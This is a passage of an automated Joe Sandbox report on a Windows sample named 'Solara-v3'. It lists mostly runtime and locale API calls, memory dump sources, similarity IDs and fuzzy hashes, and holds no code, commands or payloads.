                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00CB697F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                                              • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetConsoleOutputCP.KERNEL32(3F29B6ED,00000000,00000000,?), ref: 00CB4001
                                                                                                                                                                                                                                                • Part of subcall function 00CAC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CAD895,?,00000000,-00000008), ref: 00CAC082
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00CB4253
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00CB4299
                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CB433C
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2112829910-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AdjustPointer
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1740715915-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00C972C5
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C97395
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C973A3
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C973B1
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2261580123-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C94495
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C944B2
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C944D3
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C94580
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 593203224-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CAD895,?,00000000,-00000008), ref: 00CAC082
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00CB1E2A
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00CB1E31
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00CB1E6B
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00CB1E72
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1913693674-0
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00CB31C6
                                                                                                                                                                                                                                                • Part of subcall function 00CAC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CAD895,?,00000000,-00000008), ref: 00CAC082
                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CB31FE
                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CB321E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 158306478-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00C9E899
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C9E8A3
                                                                                                                                                                                                                                              • int.LIBCPMT ref: 00C9E8BA
                                                                                                                                                                                                                                                • Part of subcall function 00C9C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 00C9C1F6
                                                                                                                                                                                                                                                • Part of subcall function 00C9C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 00C9C210
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C9E914
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1383202999-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00CBA2EF,00000000,00000001,00000000,?,?,00CB4390,?,00000000,00000000), ref: 00CBADB7
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00CBA2EF,00000000,00000001,00000000,?,?,00CB4390,?,00000000,00000000,?,?,?,00CB3CD6,00000000), ref: 00CBADC3
                                                                                                                                                                                                                                                • Part of subcall function 00CBAE20: CloseHandle.KERNEL32(FFFFFFFE,00CBADD3,?,00CBA2EF,00000000,00000001,00000000,?,?,00CB4390,?,00000000,00000000,?,?), ref: 00CBAE30
                                                                                                                                                                                                                                              • ___initconout.LIBCMT ref: 00CBADD3
                                                                                                                                                                                                                                                • Part of subcall function 00CBADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00CBAD91,00CBA2DC,?,?,00CB4390,?,00000000,00000000,?), ref: 00CBAE08
                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00CBA2EF,00000000,00000001,00000000,?,?,00CB4390,?,00000000,00000000,?), ref: 00CBADE8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2744216297-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00CA0507
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00CA0516
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00CA051F
                                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00CA052C
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: GetLastError.KERNEL32(?,?,00CA5495,00CC8E38,0000000C), ref: 00CAC16E
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: SetLastError.KERNEL32(00000000), ref: 00CAC210
                                                                                                                                                                                                                                              • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00CA5BD5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00CB0A35
                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00CA5BD5,?,?,?,00000055,?,-00000050,?,?), ref: 00CB0A6C
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                              • String ID: utf8
                                                                                                                                                                                                                                              • API String ID: 943130320-905460609
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::_Release_chore.LIBCPMT ref: 00C97526
                                                                                                                                                                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 00C97561
                                                                                                                                                                                                                                                • Part of subcall function 00C9AF37: CreateThreadpoolWork.KERNEL32(00C9B060,00C98A2A,00000000), ref: 00C9AF46
                                                                                                                                                                                                                                                • Part of subcall function 00C9AF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 00C9AF53
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
                                                                                                                                                                                                                                              • String ID: Fail to schedule the chore!
                                                                                                                                                                                                                                              • API String ID: 3683891980-3313369819
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00CAB893,?,?,00000000,00000000,00000000,?), ref: 00CAB9B7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EncodePointer
                                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                                              • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                              • Opcode ID: fbac9198bbffec7a8d949c76ff60707beb2b787f1685d0761e718f8b23fc6f46
                                                                                                                                                                                                                                              • Instruction ID: e80d0cf6610c124bb625fe88371f26ab797a988f92c948693c49de585d517636
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fbac9198bbffec7a8d949c76ff60707beb2b787f1685d0761e718f8b23fc6f46
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50417C7190020AAFCF15DFA4CC81AEEBBB5FF49308F188159F924A7212D3359E50EB51
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C93EC6
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C94002
                                                                                                                                                                                                                                                • Part of subcall function 00C9ABC5: _Yarn.LIBCPMT ref: 00C9ABE5
                                                                                                                                                                                                                                                • Part of subcall function 00C9ABC5: _Yarn.LIBCPMT ref: 00C9AC09
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                                                                                                              • API String ID: 2070049627-1405518554
                                                                                                                                                                                                                                              • Opcode ID: 18f1916631207a6d2bfb79ec77a533819457425db6c0d478e9f9ce88e4f50530
                                                                                                                                                                                                                                              • Instruction ID: ae366999bdcb40a1702a43e072b566ec46888b6a879336fde06ac6f3e84d8a84
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18f1916631207a6d2bfb79ec77a533819457425db6c0d478e9f9ce88e4f50530
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D44162F1A007459BEB10DF69D80AB57BBF8BF04714F044628E4499B781E77AE618CBE1
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00CAB475
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                                              • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                              • Opcode ID: e9df07570ca4620ddc353e0e6b1fcc84144f130d3193f03ebe353398e877e2af
                                                                                                                                                                                                                                              • Instruction ID: b8d88eb3e92f490ed51751adbb3ef6df764c1ebcd3433037fd316e02aa15707c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9df07570ca4620ddc353e0e6b1fcc84144f130d3193f03ebe353398e877e2af
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7231E971800217EFCF269F51CC409EA7B66FF0A31DB18465AF86449123C336DEA1EB81
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00C9B8B9
                                                                                                                                                                                                                                              • RaiseException.KERNEL32(?,?,?,?,?), ref: 00C9B8DE
                                                                                                                                                                                                                                                • Part of subcall function 00CA060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00C9F354,032E25E8,?,?,?,00C9F354,00C93D4A,00CC759C,00C93D4A), ref: 00CA066D
                                                                                                                                                                                                                                                • Part of subcall function 00CA8353: IsProcessorFeaturePresent.KERNEL32(00000017,00CAC224), ref: 00CA836F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                                              • Opcode ID: ae30d4c93b46270b147c77a8bc1708a490dbb167901a33847433bd2abcbd63b3
                                                                                                                                                                                                                                              • Instruction ID: 2c8d3b34e75c3408a7a90ce20f8c63a488ac363cbf43403c56cd2b06a4434a9f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae30d4c93b46270b147c77a8bc1708a490dbb167901a33847433bd2abcbd63b3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54217F31D0021CFBCF24DF95EA49AEEB7B9AF48710F150419E415AB190CB70AE55DB85
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 00C92673
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ___std_exception_copy
                                                                                                                                                                                                                                              • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                              • API String ID: 2659868963-1158432155
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CA060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00C9F354,032E25E8,?,?,?,00C9F354,00C93D4A,00CC759C,00C93D4A), ref: 00CA066D
                                                                                                                                                                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 00C92673
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                                              • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                              • API String ID: 3109751735-1158432155
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,00CB13BD,00000002,00000000,?,?,?,00CB13BD,?,00000000), ref: 00CB1AA0
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,00CB13BD,00000002,00000000,?,?,?,00CB13BD,?,00000000), ref: 00CB1AC9
                                                                                                                                                                                                                                              • GetACP.KERNEL32(?,?,00CB13BD,?,00000000), ref: 00CB1ADE
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
• Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00C91240: _strlen.LIBCMT ref: 00C912BA
                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00C92046
                                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C9206B
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00C9207A
                                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 00C920CD
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00C921FD
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseFileHandle_strlen$ReadSize
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1490117831-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: GetLastError.KERNEL32(00000000,?,00CAE58D), ref: 00CAC16E
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: SetLastError.KERNEL32(00000000,?,?,00000028,00CA8363), ref: 00CAC210
                                                                                                                                                                                                                                              • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00CB138F
                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 00CB13CD
                                                                                                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 00CB13E0
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00CB1428
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00CB1443
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 415426439-0
Memory Dump Source
• Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmp
